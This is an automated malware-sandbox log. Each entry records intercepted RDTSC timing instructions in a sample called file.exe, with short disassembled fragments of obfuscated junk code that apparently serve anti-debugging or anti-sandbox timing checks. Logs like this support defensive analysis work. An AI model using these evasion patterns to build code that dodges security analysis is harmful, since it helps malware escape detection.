Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAF86 second address: 9BAF8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8009 second address: 9B800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B800D second address: 9B802F instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA0CCCDDCh 0x00000008 jg 00007F8FA0CCCDD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8FA0CCCDDFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5F8A second address: 9B5F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBFC9 second address: 9BBFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB114 second address: 9BB17F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A487h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8FA106A47Dh 0x0000000f nop 0x00000010 xor dword ptr [ebp+122D1CACh], esi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d jmp 00007F8FA106A47Ah 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov ebx, dword ptr [ebp+122D2C04h] 0x0000002f and bl, 00000060h 0x00000032 mov eax, dword ptr [ebp+122D0271h] 0x00000038 mov ebx, ecx 0x0000003a push FFFFFFFFh 0x0000003c or ebx, dword ptr [ebp+122D360Eh] 0x00000042 nop 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 jp 00007F8FA106A476h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC11B second address: 9BC120 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC120 second address: 9BC1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F8FA106A478h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D36E6h] 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+122D1AB0h], ecx 0x00000035 mov bx, cx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007F8FA106A478h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 mov bx, F5DBh 0x0000005d stc 0x0000005e mov eax, dword ptr [ebp+122D0FA9h] 0x00000064 mov edi, dword ptr [ebp+122D28CEh] 0x0000006a push FFFFFFFFh 0x0000006c add dword ptr [ebp+1248087Ah], ebx 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 jnp 00007F8FA106A476h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC1A2 second address: 9BC1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC1A8 second address: 9BC1C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFF2A second address: 9BFF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FA0CCCDE9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFF48 second address: 9BFF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFF55 second address: 9BFF63 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F8FA0CCCDDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C30AB second address: 9C30AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C30AF second address: 9C30B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C30B7 second address: 9C30D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8FA106A47Fh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e je 00007F8FA106A476h 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B2E second address: 9C2B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2B33 second address: 9C2B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8FA106A476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C2C6B second address: 9C2C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8FA0CCCDD6h 0x0000000a pop eax 0x0000000b jc 00007F8FA0CCCDDCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9C03 second address: 9C9C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8FA106A476h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9C0E second address: 9C9C36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8FA0CCCDEEh 0x00000008 jmp 00007F8FA0CCCDE8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9C36 second address: 9C9C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9D57 second address: 9C9D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9E41 second address: 9C9E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9E46 second address: 9C9E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F8FA0CCCDE3h 0x00000016 jmp 00007F8FA0CCCDDDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9E69 second address: 9C9E85 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8FA106A47Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F8FA106A47Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9E85 second address: 9C9E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9E89 second address: 9C9EA3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8FA106A47Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C9EA3 second address: 9C9EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CB80F second address: 9CB813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CB813 second address: 9CB824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007F8FA0CCCE1Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF5E4 second address: 9CF5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF5EC second address: 9CF5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF5F0 second address: 9CF5F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CFB86 second address: 9CFBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jc 00007F8FA0CCCDF0h 0x0000000d jmp 00007F8FA0CCCDDCh 0x00000012 jmp 00007F8FA0CCCDDEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CFBAD second address: 9CFBB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3D0 second address: 95A3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3D6 second address: 95A3E0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3E0 second address: 95A3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3E6 second address: 95A3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95A3EC second address: 95A416 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8FA0CCCDE5h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jbe 00007F8FA0CCCDEFh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A11 second address: 9D6A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A15 second address: 9D6A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A19 second address: 9D6A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA106A480h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A2F second address: 9D6A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F8FA0CCCDD6h 0x00000009 jng 00007F8FA0CCCDD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A40 second address: 9D6A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F8FA106A476h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6A4F second address: 9D6A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6B9F second address: 9D6BD7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FA106A476h 0x00000008 jmp 00007F8FA106A481h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8FA106A47Ah 0x00000014 pushad 0x00000015 push esi 0x00000016 jmp 00007F8FA106A47Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6BD7 second address: 9D6BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6BE0 second address: 9D6BE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6FDD second address: 9D6FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F8FA0CCCDDCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6FEE second address: 9D7021 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Fh 0x00000007 push eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007F8FA106A478h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8FA106A481h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7021 second address: 9D7040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7040 second address: 9D7048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D71A9 second address: 9D71D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F8FA0CCCDDAh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D71D4 second address: 9D71D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7469 second address: 9D748A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDDEh 0x00000007 ja 00007F8FA0CCCDD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D748A second address: 9D74AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8FA106A487h 0x0000000b jns 00007F8FA106A476h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7765 second address: 9D777F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8FA0CCCDE0h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7A67 second address: 9D7A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F8FA106A486h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DD815 second address: 9DD819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC7A1 second address: 9DC7A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC7A7 second address: 9DC7C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F8FA0CCCDD8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC7C0 second address: 9DC7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99DFD9 second address: 99E035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F8FA0CCCDD8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov dx, B006h 0x00000029 lea eax, dword ptr [ebp+12481DAFh] 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F8FA0CCCDE9h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E035 second address: 99E048 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8FA106A478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E4B8 second address: 99E4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E585 second address: 99E589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E673 second address: 99E678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E678 second address: 99E695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8FA106A480h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E80A second address: 99E80F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E80F second address: 99E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], esi 0x0000000a mov edx, 0BF3AC4Eh 0x0000000f mov edx, dword ptr [ebp+122D3722h] 0x00000015 nop 0x00000016 pushad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E9B4 second address: 99E9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99E9B9 second address: 99E9C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8FA106A476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99EE5E second address: 99EE68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8FA0CCCDDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99EE68 second address: 99EEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D28DEh] 0x00000014 push 0000001Eh 0x00000016 stc 0x00000017 nop 0x00000018 pushad 0x00000019 push ecx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d jmp 00007F8FA106A486h 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnp 00007F8FA106A47Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99EEA7 second address: 99EEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F1CE second address: 99F1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F1D2 second address: 99F1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F282 second address: 99F2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA106A481h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007F8FA106A47Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F2A3 second address: 99F314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA0CCCDE5h 0x00000009 popad 0x0000000a nop 0x0000000b push ecx 0x0000000c mov cx, 7657h 0x00000010 pop edi 0x00000011 jmp 00007F8FA0CCCDE2h 0x00000016 lea eax, dword ptr [ebp+12481DF3h] 0x0000001c jmp 00007F8FA0CCCDE8h 0x00000021 nop 0x00000022 jmp 00007F8FA0CCCDE5h 0x00000027 push eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jno 00007F8FA0CCCDD6h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F314 second address: 985453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8FA106A47Ch 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F8FA106A478h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D1A8Bh] 0x0000002e lea eax, dword ptr [ebp+12481DAFh] 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F8FA106A478h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e mov di, 444Eh 0x00000052 push eax 0x00000053 jmp 00007F8FA106A47Eh 0x00000058 mov dword ptr [esp], eax 0x0000005b js 00007F8FA106A476h 0x00000061 call dword ptr [ebp+1245C34Ah] 0x00000067 pushad 0x00000068 jns 00007F8FA106A47Ch 0x0000006e push ebx 0x0000006f push eax 0x00000070 pop eax 0x00000071 pop ebx 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DCBDD second address: 9DCBF1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F8FA0CCCDD6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DD161 second address: 9DD165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
